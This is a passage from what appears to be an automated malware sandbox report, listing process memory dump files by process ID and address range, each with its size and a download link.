
Filesize
760KB

Download
memory/4288-143-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/4288-174-0x00007FFA71D50000-0x00007FFA71F45000-memory.dmp

Filesize
2.0MB

Download
memory/4288-148-0x00007FFA71D50000-0x00007FFA71F45000-memory.dmp

Filesize
2.0MB

Download
memory/4400-188-0x0000000002A90000-0x0000000002AA2000-memory.dmp

Filesize
72KB

Download
memory/4400-155-0x0000000000000000-mapping.dmp

Download
memory/4400-196-0x000000001CC20000-0x000000001CC5C000-memory.dmp

Filesize
240KB

Download
memory/4400-206-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/4400-165-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/4400-159-0x0000000000A30000-0x0000000000A50000-memory.dmp

Filesize
128KB

Download
memory/4420-137-0x0000000000000000-mapping.dmp

Download
memory/4640-134-0x00000264182F0000-0x0000026418312000-memory.dmp

Filesize
136KB

Download
memory/4640-136-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/4640-138-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/4640-133-0x0000000000000000-mapping.dmp

Download
memory/4648-183-0x0000000000000000-mapping.dmp

Download
memory/4732-352-0x0000000000000000-mapping.dmp

Download
memory/4888-187-0x0000000000000000-mapping.dmp

Download
memory/4888-205-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/4888-232-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/4896-251-0x0000000000000000-mapping.dmp

Download
memory/5164-217-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/5164-230-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/5164-202-0x0000000000000000-mapping.dmp

Download
memory/5364-405-0x0000000000000000-mapping.dmp

Download
memory/5380-210-0x0000000000000000-mapping.dmp

Download
memory/5380-255-0x0000000006160000-0x000000000616A000-memory.dmp

Filesize
40KB

Download
memory/5408-214-0x0000000000000000-mapping.dmp

Download
memory/5508-296-0x000001809BA10000-0x000001809BA30000-memory.dmp

Filesize
128KB

Download
memory/5508-356-0x000001809BAB0000-0x000001809BAB3000-memory.dmp

Filesize
12KB

Download
memory/5508-279-0x00000180ABA90000-0x00000180ABB90000-memory.dmp

Filesize
1024KB

Download
memory/5508-276-0x000001809B9F0000-0x000001809BA10000-memory.dmp

Filesize
128KB

Download
memory/5508-354-0x000001809BAB0000-0x000001809BAB3000-memory.dmp

Filesize
12KB

Download
memory/5508-355-0x000001809BAB0000-0x000001809BAB3000-memory.dmp

Filesize
12KB

Download
memory/5508-282-0x000001809B740000-0x000001809B760000-memory.dmp

Filesize
128KB

Download
memory/5508-359-0x000001809BAB5000-0x000001809BAB9000-memory.dmp

Filesize
16KB

Download
memory/5508-353-0x000001809BAB0000-0x000001809BAB3000-memory.dmp

Filesize
12KB

Download
memory/5796-404-0x0000000000000000-mapping.dmp

Download
memory/5856-263-0x00007FFA53200000-0x00007FFA53CC1000-memory.dmp

Filesize
10.8MB

Download
memory/5856-265-0x00007FFA53200000-0x00007FFA53CC1000-memory.dmp

Filesize
10.8MB

Download
memory/5856-221-0x0000000000000000-mapping.dmp

Download
memory/5916-223-0x0000000000000000-mapping.dmp

Download